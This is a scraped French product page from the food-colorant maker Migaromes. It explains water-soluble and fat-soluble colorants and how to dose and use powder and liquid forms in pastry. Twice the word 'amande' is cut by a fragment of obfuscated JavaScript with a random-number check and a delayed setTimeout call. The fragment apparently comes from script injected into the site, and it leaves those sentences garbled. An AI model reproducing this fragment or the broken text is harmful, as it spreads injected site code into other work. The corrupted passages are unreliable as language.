Loading...
Colorant Liposuble & Hydrosolube 2018-01-05T17:22:51+00:00

Project Description

Migaromes : Fabricant & Producteur

DEMANDE DE DEVIS

Colorant Liposuble

 La coloration dans la masse :

Tout de suite deux définitions qui répartissent les colorants alimentaires dans deux catégories :
– les colorants alimentaires hydrosolubles sont solubles dans l’eau
– les colorants alimentaires liposolubles sont solubles dans les graisses.

les colorants alimentaires hydrosolubles :

On distingue plusieurs formes de colorants hydrosolubles : les colorants alimentaires liquides, les colorants alimentaires poudres. Ils conviennent pour la coloration des produits à base de sucre et de pâte d’amandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande, et pour la coloration dans la masse des macarons, pastillages, gâteaux, crèmes au beurre, crème chantilly. NB : « teinter dans la masse » signifie incorporer le colorant dans la préparation.

 Colorants poudre alimentaires :

Dilution : en raison de la très forte concentration de ces colorants alimentaires, comptez 1 pointe de couteau pour 1 litre de préparation. Si vous disposez d’une balance de précision, dosage = 0,5 g pour 1 kg.

Mode d’emploi : Dans une pâte liquide, ajouter directement le colorant poudre alimentaire. La texture poudre est idéale pour la coloration des glaçages et de tous les biscuits sur base montée tels les meringues et la pâte à bombe.

Colorants alimentaires hydrosolubles  liquides :

Les colorants alimentaires liquides formulés à base d’eau sont idéaux pour colorer des appareils liquides ou crémeux, chauds ou froids. Ils conviennent également pour teinter dans la masse les pâtisseries cuites au four (meringues, macarons, pâtes à gâteaux diverses, etc…), à condition de monter d’une teinte, car ils perdent une teinte à la cuisson.

 les colorants liposolubles en poudre

Le colorant alimentaire liposoluble en poudre convient pour la décoration du chocolat, des produits à base de sucre et de pâte d’amandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes. Il est idéal pour colorer le beurre, la margarine, le chocolat blanc et le nappage neutre à froid. Vous pouvez également utiliser ce colorant dans vos préparations à cuire telles que tartelettes ou biscuits.

 Mode d’emploi : Ajouter directement le colorant poudre dans la masse à colorer. Conseil : au moment d’ajouter les poudres colorées, le beurre ou la margarine doit être souple, à température ambiante, et le chocolat blanc doit être fondu au bain-marie.

Caractéristiques